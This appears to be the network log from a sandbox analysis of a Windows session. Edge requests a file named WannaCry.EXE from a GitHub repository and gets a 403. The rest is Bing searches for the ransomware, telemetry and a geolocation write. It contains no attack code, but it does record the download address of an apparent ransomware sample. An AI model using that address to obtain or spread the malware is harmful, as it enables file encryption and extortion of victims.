x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: C4E2:29476D:13227C:14636C:67117BE2
OPTIONS

https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE

msedge.exe

Remote address:

185.199.110.133:443

Request

OPTIONS /limiteci/WannaCry/refs/heads/main/WannaCry.EXE HTTP/2.0
host: raw.githubusercontent.com
accept: */*
access-control-request-method: GET
access-control-request-headers: turbo-visit
origin: https://github.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 403

cache-control: no-cache
content-type: text/html; charset=utf-8
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 0
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:44 GMT
via: 1.1 varnish
x-served-by: cache-lon420145-LON
x-cache: MISS
x-cache-hits: 0
x-timer: S1729199085.807836,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: debbac740c5e08ae06d6b47b66c00e82dcac1737
expires: Thu, 17 Oct 2024 21:09:44 GMT
vary: Authorization,Accept-Encoding
POST

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

WINWORD.EXE

Remote address:

52.109.89.19:443

Request

POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_41
X-OfficeVersion: 16.0.18130.30575
X-OfficeCluster: weu-000.roaming.officeapps.live.com
X-CorrelationId: 22455785-6c6e-4026-957b-54b7d83081f3
X-Powered-By: ASP.NET
Date: Thu, 17 Oct 2024 21:05:47 GMT
Content-Length: 654

92.123.128.172:443

https://www.bing.com/favicon.ico

tls, http2

msedge.exe

215.0kB
1.2MB
1037
1417

HTTP Request

GET https://www.bing.com/qbox?query=&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&oit=0

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=o&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=2455b8af9e784c348470511fd44c7c35&oit=1&cp=1&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=fae02e03ae6d473a9a7fe4907c1ced86&oit=1&cp=2&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=8bfb0f52140a49759b720e816e67319c&oit=1&cp=3&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=1aff0d625f8046e9bee98c945dae8c01&oit=1&cp=4&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=5a9194d7e37846c38d5ce23ab5ea435f&oit=4&cp=5&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=6aeb459c4dc942e09bf7cba6676cd3f2&oit=4&cp=6&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+c&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=e6a7dc39f6e64370a980e46857887d18&oit=4&cp=7&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cr&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=791ef0218576488381a713f4aba40517&oit=4&cp=8&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=52c7ed0b5d7441829bc1a37d4f480692&oit=4&cp=9&pgcl=4

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=13c0d78c1f5340eeaa0e4f27de5be502&oit=4&cp=10&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+m&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=81e6d00de1044d26bdf3fa2b4a74365e&oit=4&cp=11&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+ma&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=6cc8bea2816e4e1cbfa06727948b2cfe&oit=4&cp=12&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+mal&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=4a81c90cca7b41d78b0a76e9655628f0&oit=4&cp=13&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+mala&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=26e8c446078e47f5bae62713e5c1c9a7&oit=4&cp=14&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+malaw&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=ce294716042c4dd8b26d0fe28a6471e6&oit=4&cp=15&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+malawa&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=22390f1b407248dfbf9495fef351af4f&oit=4&cp=16&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=one+a+cry+malawar&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=f2e1e6171c6a42e69cf751fe2eaa5274&oit=4&cp=17&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:12,%22BC%22:515,%22SE%22:-1,%22TC%22:-1,%22H%22:659,%22BP%22:662,%22CT%22:669,%22IL%22:8},%22ad%22:[-1,-1,1263,601,1263,2230,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

GET https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico

HTTP Request

GET https://www.bing.com/rp/oocd_GLJp7OiNEvIPidegylCzYE.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.0.0/js/widget.js?t=241017

HTTP Request

GET https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/geolocation/write?isDevLoc=false&lat=52.47917556762695&lon=-1.9018261432647705&dispName=Birmingham%252C%2520West%2520Midlands&isEff=1&effLocType=1&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199024772%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.6%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199024772%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024857%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024922%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024922%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A674%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024947%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024961%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024963%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024963%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

HTTP Request

GET https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg

HTTP Request

GET https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1729199025155%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=125258D7D1334F6085405077EDD48B89&iid=.5099&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.HoverLink%22%2C%22TS%22%3A1729199025287%2C%22Name%22%3A%22Hover%22%2C%22FID%22%3A%22Original%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025293%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1729199025533%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1710%2C%22time%22%3A1724%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199025533%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1730%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199025539%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1730%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199025539%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=50509585&IID=SERP.5056&IG=125258D7D1334F6085405077EDD48B89

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=125258D7D1334F6085405077EDD48B89&IID=SERP.5065&q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/g2mFaePdYzQOubI8JEItbebrED8.gz.css

HTTP Request

GET https://r.bing.com/rp/_ykiGO1K5rjAQeICdJheT3jfLeY.gz.css

HTTP Request

GET https://r.bing.com/rp/Yb-MiHwFpZo4XYbuuNLKCnyhd1M.gz.css

HTTP Request

GET https://r.bing.com/rp/tPLNa5UcMaQEzzg0acZfPM45N6I.gz.css

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/wiki?hash=3DA89B68261078C11D1C&order=1%2c2%2c3%2c4%2c5%2c6%2c7&width=608&open=0&accId=TopWikiRichCardV2&appNS=SERP&containsHeroSection=True&bgIndex=16%2c8%2c17%2c15%2c4%2c12%2c11&sectionLines=7%2c8%2c5%2c8%2c5%2c5%2c5&answerID=5824&DataSource=DefaultProd&iid=SERP.5824&ig=125258D7D1334F6085405077EDD48B89

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum24%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f24%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?BF=MSJ1&IG=125258D7D1334F6085405077EDD48B89&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]

HTTP Request

GET https://www.bing.com/fd/ls/l?BF=MSJ0&IG=125258D7D1334F6085405077EDD48B89&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]

HTTP Request

GET https://www.bing.com/rp/L-nYmICjtADpEJxTNradKdlXr-c.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum12%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f12%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/orgid/idtoken/conditional

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267117bb001b14002a55ff298bb5ee315%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199025557%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267117bb001b14002a55ff298bb5ee315%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199025557%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025582%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025615%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025752%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199025820%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22wikiWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199025886%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22wikiWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026343%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026343%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026379%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199026381%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.PPT&DATA={%22S%22:992,%22E%22:2476,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

